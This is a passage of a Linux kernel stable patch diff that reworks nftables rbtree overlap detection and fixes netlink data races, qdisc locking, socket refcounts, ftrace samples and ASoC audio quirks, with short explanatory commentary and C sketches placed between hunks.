+-	 * a1. _ _ __>|  ?_ _ __|  (insert end before existing end)
+-	 * a2. _ _ ___|  ?_ _ _>|  (insert end after existing end)
+-	 * a3. _ _ ___? >|_ _ __|  (insert start before existing end)
+-	 *
+-	 * and clear it later on, as we eventually reach the points indicated by
+-	 * '?' above, in the cases described below. We'll always meet these
+-	 * later, locally, due to tree ordering, and overlaps for the intervals
+-	 * that are the closest together are always evaluated last.
+-	 *
+-	 * b1. _ _ __>|  !_ _ __|  (insert end before existing start)
+-	 * b2. _ _ ___|  !_ _ _>|  (insert end after existing start)
+-	 * b3. _ _ ___! >|_ _ __|  (insert start after existing end, as a leaf)
+-	 *            '--' no nodes falling in this range
+-	 * b4.          >|_ _   !  (insert start before existing start)
+-	 *
+-	 * Case a3. resolves to b3.:
+-	 * - if the inserted start element is the leftmost, because the '0'
+-	 *   element in the tree serves as end element
+-	 * - otherwise, if an existing end is found immediately to the left. If
+-	 *   there are existing nodes in between, we need to further descend the
+-	 *   tree before we can conclude the new start isn't causing an overlap
+-	 *
+-	 * or to b4., which, preceded by a3., means we already traversed one or
+-	 * more existing intervals entirely, from the right.
+-	 *
+-	 * For a new, rightmost pair of elements, we'll hit cases b3. and b2.,
+-	 * in that order.
+-	 *
+-	 * The flag is also cleared in two special cases:
+-	 *
+-	 * b5. |__ _ _!|<_ _ _   (insert start right before existing end)
+-	 * b6. |__ _ >|!__ _ _   (insert end right after existing start)
+-	 *
+-	 * which always happen as last step and imply that no further
+-	 * overlapping is possible.
+-	 *
+-	 * Another special case comes from the fact that start elements matching
+-	 * an already existing start element are allowed: insertion is not
+-	 * performed but we return -EEXIST in that case, and the error will be
+-	 * cleared by the caller if NLM_F_EXCL is not present in the request.
+-	 * This way, request for insertion of an exact overlap isn't reported as
+-	 * error to userspace if not desired.
+-	 *
+-	 * However, if the existing start matches a pre-existing start, but the
+-	 * end element doesn't match the corresponding pre-existing end element,
+-	 * we need to report a partial overlap. This is a local condition that
+-	 * can be noticed without need for a tracking flag, by checking for a
+-	 * local duplicated end for a corresponding start, from left and right,
+-	 * separately.
++	/* Descend the tree to search for an existing element greater than the
++	 * key value to insert that is greater than the new element. This is the
++	 * first element to walk the ordered elements to find possible overlap.
+ 	 */
+-
+ 	parent = NULL;
+ 	p = &priv->root.rb_node;
+ 	while (*p != NULL) {
+ 		parent = *p;
+ 		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
+-		d = memcmp(nft_set_ext_key(&rbe->ext),
+-			   nft_set_ext_key(&new->ext),
+-			   set->klen);
++		d = nft_rbtree_cmp(set, rbe, new);
++
+ 		if (d < 0) {
+ 			p = &parent->rb_left;
+-
+-			if (nft_rbtree_interval_start(new)) {
+-				if (nft_rbtree_interval_end(rbe) &&
+-				    nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext) && !*p)
+-					overlap = false;
+-			} else {
+-				if (dup_end_left && !*p)
+-					return -ENOTEMPTY;
+-
+-				overlap = nft_rbtree_interval_end(rbe) &&
+-					  nft_set_elem_active(&rbe->ext,
+-							      genmask) &&
+-					  !nft_set_elem_expired(&rbe->ext);
+-
+-				if (overlap) {
+-					dup_end_right = true;
+-					continue;
+-				}
+-			}
+ 		} else if (d > 0) {
+-			p = &parent->rb_right;
++			if (!first ||
++			    nft_rbtree_update_first(set, rbe, first))
++				first = &rbe->node;
+ 
+-			if (nft_rbtree_interval_end(new)) {
+-				if (dup_end_right && !*p)
+-					return -ENOTEMPTY;
+-
+-				overlap = nft_rbtree_interval_end(rbe) &&
+-					  nft_set_elem_active(&rbe->ext,
+-							      genmask) &&
+-					  !nft_set_elem_expired(&rbe->ext);
+-
+-				if (overlap) {
+-					dup_end_left = true;
+-					continue;
+-				}
+-			} else if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				   !nft_set_elem_expired(&rbe->ext)) {
+-				overlap = nft_rbtree_interval_end(rbe);
+-			}
++			p = &parent->rb_right;
+ 		} else {
+-			if (nft_rbtree_interval_end(rbe) &&
+-			    nft_rbtree_interval_start(new)) {
++			if (nft_rbtree_interval_end(rbe))
+ 				p = &parent->rb_left;
+-
+-				if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext))
+-					overlap = false;
+-			} else if (nft_rbtree_interval_start(rbe) &&
+-				   nft_rbtree_interval_end(new)) {
++			else
+ 				p = &parent->rb_right;
++		}
++	}
++
++	if (!first)
++		first = rb_first(&priv->root);
++
++	/* Detect overlap by going through the list of valid tree nodes.
++	 * Values stored in the tree are in reversed order, starting from
++	 * highest to lowest value.
++	 */
++	for (node = first; node != NULL; node = rb_next(node)) {
++		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
+-				if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				    !nft_set_elem_expired(&rbe->ext))
+-					overlap = false;
+-			} else if (nft_set_elem_active(&rbe->ext, genmask) &&
+-				   !nft_set_elem_expired(&rbe->ext)) {
+-				*ext = &rbe->ext;
+-				return -EEXIST;
+-			} else {
+-				overlap = false;
+-				if (nft_rbtree_interval_end(rbe))
+-					p = &parent->rb_left;
+-				else
+-					p = &parent->rb_right;
++		if (!nft_set_elem_active(&rbe->ext, genmask))
++			continue;
++
++		/* perform garbage collection to avoid bogus overlap reports. */
++		if (nft_set_elem_expired(&rbe->ext)) {
++			err = nft_rbtree_gc_elem(set, priv, rbe);
++			if (err < 0)
++				return err;
++
++			continue;
++		}
++
++		d = nft_rbtree_cmp(set, rbe, new);
++		if (d == 0) {
++			/* Matching end element: no need to look for an
++			 * overlapping greater or equal element.
++			 */
++			if (nft_rbtree_interval_end(rbe)) {
++				rbe_le = rbe;
++				break;
++			}
++
++			/* first element that is greater or equal to the key value. */
++			if (!rbe_ge) {
++				rbe_ge = rbe;
++				continue;
++			}
++
++			/* this is a closer greater-or-equal element; update it. */
++			if (nft_rbtree_cmp(set, rbe_ge, new) != 0) {
++				rbe_ge = rbe;
++				continue;
++			}
++
++			/* element is equal to the key value: make sure the
++			 * flags match, as an existing greater-or-equal start
++			 * element must not be replaced by a greater-or-equal
++			 * end element.
++			 */
++			if ((nft_rbtree_interval_start(new) &&
++			     nft_rbtree_interval_start(rbe_ge)) ||
++			    (nft_rbtree_interval_end(new) &&
++			     nft_rbtree_interval_end(rbe_ge))) {
++				rbe_ge = rbe;
++				continue;
+ 			}
++		} else if (d > 0) {
++			/* annotate element greater than the new element. */
++			rbe_ge = rbe;
++			continue;
++		} else if (d < 0) {
++			/* annotate element less than the new element. */
++			rbe_le = rbe;
++			break;
+ 		}
++	}
+ 
+-		dup_end_left = dup_end_right = false;
++	/* - new start element matching existing start element: full overlap
++	 *   reported as -EEXIST, cleared by caller if NLM_F_EXCL is not given.
++	 */
++	if (rbe_ge && !nft_rbtree_cmp(set, new, rbe_ge) &&
++	    nft_rbtree_interval_start(rbe_ge) == nft_rbtree_interval_start(new)) {
++		*ext = &rbe_ge->ext;
++		return -EEXIST;
+ 	}
+ 
+-	if (overlap)
++	/* - new end element matching existing end element: full overlap
++	 *   reported as -EEXIST, cleared by caller if NLM_F_EXCL is not given.
++	 */
++	if (rbe_le && !nft_rbtree_cmp(set, new, rbe_le) &&
++	    nft_rbtree_interval_end(rbe_le) == nft_rbtree_interval_end(new)) {
++		*ext = &rbe_le->ext;
++		return -EEXIST;
++	}
++
++	/* - new start element with existing closest, less or equal key value
++	 *   being a start element: partial overlap, reported as -ENOTEMPTY.
++	 *   Anonymous sets allow for two consecutive start elements since they
++	 *   are constant; skip them to avoid bogus overlap reports.
++	 */
++	if (!nft_set_is_anonymous(set) && rbe_le &&
++	    nft_rbtree_interval_start(rbe_le) && nft_rbtree_interval_start(new))
++		return -ENOTEMPTY;
++
++	/* - new end element with existing closest, less or equal key value
++	 *   being an end element: partial overlap, reported as -ENOTEMPTY.
++	 */
++	if (rbe_le &&
++	    nft_rbtree_interval_end(rbe_le) && nft_rbtree_interval_end(new))
+ 		return -ENOTEMPTY;
+ 
++	/* - new end element with existing closest, greater or equal key value
++	 *   being an end element: partial overlap, reported as -ENOTEMPTY
++	 */
++	if (rbe_ge &&
++	    nft_rbtree_interval_end(rbe_ge) && nft_rbtree_interval_end(new))
++		return -ENOTEMPTY;
++
++	/* Accepted element: pick insertion point depending on key value */
++	parent = NULL;
++	p = &priv->root.rb_node;
++	while (*p != NULL) {
++		parent = *p;
++		rbe = rb_entry(parent, struct nft_rbtree_elem, node);
++		d = nft_rbtree_cmp(set, rbe, new);
++
++		if (d < 0)
++			p = &parent->rb_left;
++		else if (d > 0)
++			p = &parent->rb_right;
++		else if (nft_rbtree_interval_end(rbe))
++			p = &parent->rb_left;
++		else
++			p = &parent->rb_right;
++	}
++
+ 	rb_link_node_rcu(&new->node, parent, p);
+ 	rb_insert_color(&new->node, &priv->root);
+ 	return 0;
+@@ -501,23 +563,37 @@ static void nft_rbtree_gc(struct work_struct *work)
+ 	struct nft_rbtree *priv;
+ 	struct rb_node *node;
+ 	struct nft_set *set;
++	struct net *net;
++	u8 genmask;
+ 
+ 	priv = container_of(work, struct nft_rbtree, gc_work.work);
+ 	set  = nft_set_container_of(priv);
++	net  = read_pnet(&set->net);
++	genmask = nft_genmask_cur(net);
+ 
+ 	write_lock_bh(&priv->lock);
+ 	write_seqcount_begin(&priv->count);
+ 	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+ 
++		if (!nft_set_elem_active(&rbe->ext, genmask))
++			continue;
++
++		/* elements are reversed in the rbtree for historical reasons,
++		 * from highest to lowest value, which is why the end element
++		 * is always visited before the start element.
++		 */
+ 		if (nft_rbtree_interval_end(rbe)) {
+ 			rbe_end = rbe;
+ 			continue;
+ 		}
+ 		if (!nft_set_elem_expired(&rbe->ext))
+ 			continue;
+-		if (nft_set_elem_mark_busy(&rbe->ext))
++
++		if (nft_set_elem_mark_busy(&rbe->ext)) {
++			rbe_end = NULL;
+ 			continue;
++		}
+ 
+ 		if (rbe_prev) {
+ 			rb_erase(&rbe_prev->node, &priv->root);
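
The nft_set_rbtree rewrite above replaces the old per-descent flag tracking with a two-phase scheme: descend the tree to find the closest node greater than the new key, walk the ordered nodes once to record the nearest greater-or-equal (rbe_ge) and less-or-equal (rbe_le) neighbours, and derive the overlap verdict from those two neighbours alone. A minimal standalone sketch of that rule table — all names here are hypothetical, and the equal-key -EEXIST handling and the anonymous-set exception are deliberately omitted:

	/* Sketch of neighbour-based interval overlap detection, following
	 * the rules in the patch above. Not kernel code: 'endpoint' and
	 * 'overlaps' are illustrative only.
	 */
	#include <stdbool.h>
	#include <stdio.h>

	struct endpoint {
		unsigned int key;
		bool is_end;	/* mirrors nft_rbtree_interval_end() */
	};

	/* 'le' is the closest existing endpoint with key <= new->key, 'ge'
	 * the closest with key >= new->key; either may be NULL. A partial
	 * overlap exists when two starts or two ends would become adjacent.
	 */
	static bool overlaps(const struct endpoint *le,
			     const struct endpoint *ge,
			     const struct endpoint *new)
	{
		if (le && le->is_end == new->is_end)
			return true;	/* start next to a start, or end next to an end */
		if (ge && ge->is_end && new->is_end)
			return true;	/* new end with an existing end at or above it */
		return false;
	}

	int main(void)
	{
		struct endpoint lo  = { .key = 10, .is_end = false };	/* existing start */
		struct endpoint add = { .key = 15, .is_end = false };	/* new start inside */

		printf("partial overlap: %s\n",
		       overlaps(&lo, NULL, &add) ? "yes" : "no");
		return 0;
	}

For the 10/15 case shown, an existing start below a new start reports a partial overlap, matching the -ENOTEMPTY path in the patch.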
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index a662e8a5ff84a..e506712967918 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -580,7 +580,9 @@ static int netlink_insert(struct sock *sk, u32 portid)
+ 	if (nlk_sk(sk)->bound)
+ 		goto err;
+ 
+-	nlk_sk(sk)->portid = portid;
++	/* portid can be read locklessly from netlink_getname(). */
++	WRITE_ONCE(nlk_sk(sk)->portid, portid);
++
+ 	sock_hold(sk);
+ 
+ 	err = __netlink_insert(table, sk);
+@@ -1085,9 +1087,11 @@ static int netlink_connect(struct socket *sock, struct sockaddr *addr,
+ 		return -EINVAL;
+ 
+ 	if (addr->sa_family == AF_UNSPEC) {
+-		sk->sk_state	= NETLINK_UNCONNECTED;
+-		nlk->dst_portid	= 0;
+-		nlk->dst_group  = 0;
++		/* paired with READ_ONCE() in netlink_getsockbyportid() */
++		WRITE_ONCE(sk->sk_state, NETLINK_UNCONNECTED);
++		/* dst_portid and dst_group can be read locklessly */
++		WRITE_ONCE(nlk->dst_portid, 0);
++		WRITE_ONCE(nlk->dst_group, 0);
+ 		return 0;
+ 	}
+ 	if (addr->sa_family != AF_NETLINK)
+@@ -1108,9 +1112,11 @@ static int netlink_connect(struct socket *sock, struct sockaddr *addr,
+ 		err = netlink_autobind(sock);
+ 
+ 	if (err == 0) {
+-		sk->sk_state	= NETLINK_CONNECTED;
+-		nlk->dst_portid = nladdr->nl_pid;
+-		nlk->dst_group  = ffs(nladdr->nl_groups);
++		/* paired with READ_ONCE() in netlink_getsockbyportid() */
++		WRITE_ONCE(sk->sk_state, NETLINK_CONNECTED);
++		/* dst_portid and dst_group can be read locklessly */
++		WRITE_ONCE(nlk->dst_portid, nladdr->nl_pid);
++		WRITE_ONCE(nlk->dst_group, ffs(nladdr->nl_groups));
+ 	}
+ 
+ 	return err;
+@@ -1127,10 +1133,12 @@ static int netlink_getname(struct socket *sock, struct sockaddr *addr,
+ 	nladdr->nl_pad = 0;
+ 
+ 	if (peer) {
+-		nladdr->nl_pid = nlk->dst_portid;
+-		nladdr->nl_groups = netlink_group_mask(nlk->dst_group);
++		/* Paired with WRITE_ONCE() in netlink_connect() */
++		nladdr->nl_pid = READ_ONCE(nlk->dst_portid);
++		nladdr->nl_groups = netlink_group_mask(READ_ONCE(nlk->dst_group));
+ 	} else {
+-		nladdr->nl_pid = nlk->portid;
++		/* Paired with WRITE_ONCE() in netlink_insert() */
++		nladdr->nl_pid = READ_ONCE(nlk->portid);
+ 		netlink_lock_table();
+ 		nladdr->nl_groups = nlk->groups ? nlk->groups[0] : 0;
+ 		netlink_unlock_table();
+@@ -1157,8 +1165,9 @@ static struct sock *netlink_getsockbyportid(struct sock *ssk, u32 portid)
+ 
+ 	/* Don't bother queuing skb if kernel socket has no input function */
+ 	nlk = nlk_sk(sock);
+-	if (sock->sk_state == NETLINK_CONNECTED &&
+-	    nlk->dst_portid != nlk_sk(ssk)->portid) {
++	/* dst_portid and sk_state can be changed in netlink_connect() */
++	if (READ_ONCE(sock->sk_state) == NETLINK_CONNECTED &&
++	    READ_ONCE(nlk->dst_portid) != nlk_sk(ssk)->portid) {
+ 		sock_put(sock);
+ 		return ERR_PTR(-ECONNREFUSED);
+ 	}
+@@ -1875,8 +1884,9 @@ static int netlink_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 			goto out;
+ 		netlink_skb_flags |= NETLINK_SKB_DST;
+ 	} else {
+-		dst_portid = nlk->dst_portid;
+-		dst_group = nlk->dst_group;
++		/* Paired with WRITE_ONCE() in netlink_connect() */
++		dst_portid = READ_ONCE(nlk->dst_portid);
++		dst_group = READ_ONCE(nlk->dst_group);
+ 	}
+ 
+ 	/* Paired with WRITE_ONCE() in netlink_insert() */
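
All of the af_netlink.c hunks above apply one idea: a field written under the socket lock but read locklessly elsewhere gets paired WRITE_ONCE()/READ_ONCE() annotations, so the compiler may not tear, fuse or refetch the access. A stripped-down userspace sketch of the pattern — the macros here are simplified stand-ins for the kernel's (GNU C __typeof__), and the struct and function names are hypothetical:

	/* Minimal illustration of paired WRITE_ONCE()/READ_ONCE() accesses,
	 * approximated with plain volatile casts.
	 */
	#include <stdio.h>

	#define WRITE_ONCE(x, val) (*(volatile __typeof__(x) *)&(x) = (val))
	#define READ_ONCE(x)       (*(volatile __typeof__(x) *)&(x))

	struct sock_state {
		unsigned int dst_portid;
	};

	static struct sock_state nlk;

	static void connect_path(unsigned int portid)
	{
		/* paired with READ_ONCE() in lookup_path() */
		WRITE_ONCE(nlk.dst_portid, portid);
	}

	static unsigned int lookup_path(void)
	{
		/* dst_portid can be changed concurrently by connect_path() */
		return READ_ONCE(nlk.dst_portid);
	}

	int main(void)
	{
		connect_path(42);
		printf("dst_portid=%u\n", lookup_path());
		return 0;
	}

Note the annotations add no ordering or atomicity beyond single-copy access; they only make the lockless read well-defined, which is all the netlink fix needs.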
+diff --git a/net/netrom/nr_timer.c b/net/netrom/nr_timer.c
+index a8da88db7893f..4e7c968cde2dc 100644
+--- a/net/netrom/nr_timer.c
++++ b/net/netrom/nr_timer.c
+@@ -121,6 +121,7 @@ static void nr_heartbeat_expiry(struct timer_list *t)
+ 		   is accepted() it isn't 'dead' so doesn't get removed. */
+ 		if (sock_flag(sk, SOCK_DESTROY) ||
+ 		    (sk->sk_state == TCP_LISTEN && sock_flag(sk, SOCK_DEAD))) {
++			sock_hold(sk);
+ 			bh_unlock_sock(sk);
+ 			nr_destroy_socket(sk);
+ 			goto out;
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 3364caabef8b1..a27e1842b2a09 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -157,6 +157,7 @@ static void local_cleanup(struct nfc_llcp_local *local)
+ 	cancel_work_sync(&local->rx_work);
+ 	cancel_work_sync(&local->timeout_work);
+ 	kfree_skb(local->rx_pending);
++	local->rx_pending = NULL;
+ 	del_timer_sync(&local->sdreq_timer);
+ 	cancel_work_sync(&local->sdreq_timeout_work);
+ 	nfc_llcp_free_sdp_tlv_list(&local->pending_sdreqs);
+diff --git a/net/sched/sch_gred.c b/net/sched/sch_gred.c
+index a661b062cca85..872d127c9db42 100644
+--- a/net/sched/sch_gred.c
++++ b/net/sched/sch_gred.c
+@@ -377,6 +377,7 @@ static int gred_offload_dump_stats(struct Qdisc *sch)
+ 	/* Even if driver returns failure adjust the stats - in case offload
+ 	 * ended but driver still wants to adjust the values.
+ 	 */
++	sch_tree_lock(sch);
+ 	for (i = 0; i < MAX_DPs; i++) {
+ 		if (!table->tab[i])
+ 			continue;
+@@ -393,6 +394,7 @@ static int gred_offload_dump_stats(struct Qdisc *sch)
+ 		sch->qstats.overlimits += hw_stats->stats.qstats[i].overlimits;
+ 	}
+ 	_bstats_update(&sch->bstats, bytes, packets);
++	sch_tree_unlock(sch);
+ 
+ 	kfree(hw_stats);
+ 	return ret;
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index e5b4bbf3ce3d5..3afac9c21a763 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -1545,7 +1545,7 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 	struct tc_htb_qopt_offload offload_opt;
+ 	struct netdev_queue *dev_queue;
+ 	struct Qdisc *q = cl->leaf.q;
+-	struct Qdisc *old = NULL;
++	struct Qdisc *old;
+ 	int err;
+ 
+ 	if (cl->level)
+@@ -1553,14 +1553,17 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 
+ 	WARN_ON(!q);
+ 	dev_queue = htb_offload_get_queue(cl);
+-	old = htb_graft_helper(dev_queue, NULL);
+-	if (destroying)
+-		/* Before HTB is destroyed, the kernel grafts noop_qdisc to
+-		 * all queues.
++	/* When destroying, caller qdisc_graft grafts the new qdisc and invokes
++	 * qdisc_put for the qdisc being destroyed. htb_destroy_class_offload
++	 * does not need to graft or qdisc_put the qdisc being destroyed.
++	 */
++	if (!destroying) {
++		old = htb_graft_helper(dev_queue, NULL);
++		/* Last qdisc grafted should be the same as cl->leaf.q when
++		 * calling htb_delete.
+ 		 */
+-		WARN_ON(!(old->flags & TCQ_F_BUILTIN));
+-	else
+ 		WARN_ON(old != q);
++	}
+ 
+ 	if (cl->parent) {
+ 		_bstats_update(&cl->parent->bstats_bias,
+@@ -1577,10 +1580,12 @@ static int htb_destroy_class_offload(struct Qdisc *sch, struct htb_class *cl,
+ 	};
+ 	err = htb_offload(qdisc_dev(sch), &offload_opt);
+ 
+-	if (!err || destroying)
+-		qdisc_put(old);
+-	else
+-		htb_graft_helper(dev_queue, old);
++	if (!destroying) {
++		if (!err)
++			qdisc_put(old);
++		else
++			htb_graft_helper(dev_queue, old);
++	}
+ 
+ 	if (last_child)
+ 		return err;
+diff --git a/net/sched/sch_taprio.c b/net/sched/sch_taprio.c
+index 570389f6cdd7d..c322a61eaeeac 100644
+--- a/net/sched/sch_taprio.c
++++ b/net/sched/sch_taprio.c
+@@ -1700,6 +1700,7 @@ static void taprio_reset(struct Qdisc *sch)
+ 	int i;
+ 
+ 	hrtimer_cancel(&q->advance_timer);
++
+ 	if (q->qdiscs) {
+ 		for (i = 0; i < dev->num_tx_queues; i++)
+ 			if (q->qdiscs[i])
+@@ -1720,6 +1721,7 @@ static void taprio_destroy(struct Qdisc *sch)
+ 	 * happens in qdisc_create(), after taprio_init() has been called.
+ 	 */
+ 	hrtimer_cancel(&q->advance_timer);
++	qdisc_synchronize(sch);
+ 
+ 	taprio_disable_offload(dev, q, NULL);
+ 
+diff --git a/net/sctp/bind_addr.c b/net/sctp/bind_addr.c
+index 59e653b528b1f..6b95d3ba8fe1c 100644
+--- a/net/sctp/bind_addr.c
++++ b/net/sctp/bind_addr.c
+@@ -73,6 +73,12 @@ int sctp_bind_addr_copy(struct net *net, struct sctp_bind_addr *dest,
+ 		}
+ 	}
+ 
++	/* If somehow no addresses were found that can be used with this
++	 * scope, it's an error.
++	 */
++	if (list_empty(&dest->address_list))
++		error = -ENETUNREACH;
++
+ out:
+ 	if (error)
+ 		sctp_bind_addr_clean(dest);
+diff --git a/samples/ftrace/ftrace-direct-multi-modify.c b/samples/ftrace/ftrace-direct-multi-modify.c
+index 65aa94d96f4e3..6f23b1413745c 100644
+--- a/samples/ftrace/ftrace-direct-multi-modify.c
++++ b/samples/ftrace/ftrace-direct-multi-modify.c
+@@ -149,6 +149,7 @@ static void __exit ftrace_direct_multi_exit(void)
+ {
+ 	kthread_stop(simple_tsk);
+ 	unregister_ftrace_direct_multi(&direct, my_tramp);
++	ftrace_free_filter(&direct);
+ }
+ 
+ module_init(ftrace_direct_multi_init);
+diff --git a/samples/ftrace/ftrace-direct-multi.c b/samples/ftrace/ftrace-direct-multi.c
+index 41ded7c615c7f..a9a5c90fb2044 100644
+--- a/samples/ftrace/ftrace-direct-multi.c
++++ b/samples/ftrace/ftrace-direct-multi.c
+@@ -77,6 +77,7 @@ static int __init ftrace_direct_multi_init(void)
+ static void __exit ftrace_direct_multi_exit(void)
+ {
+ 	unregister_ftrace_direct_multi(&direct, (unsigned long) my_tramp);
++	ftrace_free_filter(&direct);
+ }
+ 
+ module_init(ftrace_direct_multi_init);
+diff --git a/scripts/atomic/atomics.tbl b/scripts/atomic/atomics.tbl
+old mode 100755
+new mode 100644
+diff --git a/scripts/tracing/ftrace-bisect.sh b/scripts/tracing/ftrace-bisect.sh
+index 926701162bc83..bb4f59262bbe9 100755
+--- a/scripts/tracing/ftrace-bisect.sh
++++ b/scripts/tracing/ftrace-bisect.sh
+@@ -12,7 +12,7 @@
+ #   (note, if this is a problem with function_graph tracing, then simply
+ #    replace "function" with "function_graph" in the following steps).
+ #
+-#  # cd /sys/kernel/debug/tracing
++#  # cd /sys/kernel/tracing
+ #  # echo schedule > set_ftrace_filter
+ #  # echo function > current_tracer
+ #
+@@ -20,22 +20,40 @@
+ #
+ #  # echo nop > current_tracer
+ #
+-#  # cat available_filter_functions > ~/full-file
++# Starting with v5.1 this can be done with numbers, making it much faster:
++#
++# The old (slow) way, for kernels before v5.1.
++#
++# [old-way] # cat available_filter_functions > ~/full-file
++#
++# [old-way] *** Note ***  this process will take several minutes to update the
++# [old-way] filters. Setting multiple functions is an O(n^2) operation, and we
++# [old-way] are dealing with thousands of functions. So go have coffee, talk
++# [old-way] with your coworkers, read facebook. And eventually, this operation
++# [old-way] will end.
++#
++# The new way (using numbers) is an O(n) operation, and usually takes less than a second.
++#
++# seq `wc -l available_filter_functions | cut -d' ' -f1` > ~/full-file
++#
++# This will create a sequence of numbers that match the functions in
++# available_filter_functions, and when echoing in a number into the
++# set_ftrace_filter file, it will enable the corresponding function in
++# O(1) time, making enabling all functions O(n), where n is the number of
++# functions to enable.
++#
++# For either the new or old way, the rest of the operations remain the same.
++#
+ #  # ftrace-bisect ~/full-file ~/test-file ~/non-test-file
+ #  # cat ~/test-file > set_ftrace_filter
+ #
+-# *** Note *** this will take several minutes. Setting multiple functions is
+-# an O(n^2) operation, and we are dealing with thousands of functions. So go
+-# have  coffee, talk with your coworkers, read facebook. And eventually, this
+-# operation will end.
+-#
+ #  # echo function > current_tracer
+ #
+ # If it crashes, we know that ~/test-file has a bad function.
+ #
+ #   Reboot back to test kernel.
+ #
+-#     # cd /sys/kernel/debug/tracing
++#     # cd /sys/kernel/tracing
+ #     # mv ~/test-file ~/full-file
+ #
+ # If it didn't crash.
+diff --git a/security/tomoyo/Makefile b/security/tomoyo/Makefile
+index cca5a3012fee2..221eaadffb09c 100644
+--- a/security/tomoyo/Makefile
++++ b/security/tomoyo/Makefile
+@@ -10,7 +10,7 @@ endef
+ quiet_cmd_policy  = POLICY  $@
+       cmd_policy  = ($(call do_policy,profile); $(call do_policy,exception_policy); $(call do_policy,domain_policy); $(call do_policy,manager); $(call do_policy,stat)) >$@
+ 
+-$(obj)/builtin-policy.h: $(wildcard $(obj)/policy/*.conf $(src)/policy/*.conf.default) FORCE
++$(obj)/builtin-policy.h: $(wildcard $(obj)/policy/*.conf $(srctree)/$(src)/policy/*.conf.default) FORCE
+ 	$(call if_changed,policy)
+ 
+ $(obj)/common.o: $(obj)/builtin-policy.h
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 1f0b5527c5949..0d283e41f66dc 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -206,6 +206,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "UM5302TA"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "M5402RA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+@@ -220,6 +227,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Redmi Book Pro 14 2022"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "Razer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Blade 14 (2022) - RZ09-0427"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/es8326.c b/sound/soc/codecs/es8326.c
+old mode 100755
+new mode 100644
+diff --git a/sound/soc/codecs/es8326.h b/sound/soc/codecs/es8326.h
+old mode 100755
+new mode 100644
+diff --git a/sound/soc/fsl/fsl-asoc-card.c b/sound/soc/fsl/fsl-asoc-card.c
+index c836848ef0a65..8d14b5593658d 100644
+--- a/sound/soc/fsl/fsl-asoc-card.c
++++ b/sound/soc/fsl/fsl-asoc-card.c
+@@ -121,11 +121,11 @@ static const struct snd_soc_dapm_route audio_map[] = {
+ 
+ static const struct snd_soc_dapm_route audio_map_ac97[] = {
+ 	/* 1st half -- Normal DAPM routes */
+-	{"Playback",  NULL, "AC97 Playback"},
+-	{"AC97 Capture",  NULL, "Capture"},
++	{"AC97 Playback",  NULL, "CPU AC97 Playback"},
++	{"CPU AC97 Capture",  NULL, "AC97 Capture"},
+ 	/* 2nd half -- ASRC DAPM routes */
+-	{"AC97 Playback",  NULL, "ASRC-Playback"},
+-	{"ASRC-Capture",  NULL, "AC97 Capture"},
++	{"CPU AC97 Playback",  NULL, "ASRC-Playback"},
++	{"ASRC-Capture",  NULL, "CPU AC97 Capture"},
+ };
+ 
+ static const struct snd_soc_dapm_route audio_map_tx[] = {
+diff --git a/sound/soc/fsl/fsl_micfil.c b/sound/soc/fsl/fsl_micfil.c
+index 4b86ef82fd930..4b8fe9b8be407 100644
+--- a/sound/soc/fsl/fsl_micfil.c
++++ b/sound/soc/fsl/fsl_micfil.c
+@@ -154,21 +154,21 @@ static int micfil_quality_set(struct snd_kcontrol *kcontrol,
+ 
+ static const struct snd_kcontrol_new fsl_micfil_snd_controls[] = {
+ 	SOC_SINGLE_SX_TLV("CH0 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(0), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(0), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH1 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(1), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(1), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH2 Volume", REG_MICFIL_OUT_CTRL,
+-			  MICFIL_OUTGAIN_CHX_SHIFT(2), 0xF, 0x7, gain_tlv),
++			  MICFIL_OUTGAIN_CHX_SHIFT(2), 0x8, 0xF, gain_tlv),
+ 	SOC_SINGLE_SX_TLV("CH3 Volume", REG_MICFIL_OUT_CTRL,
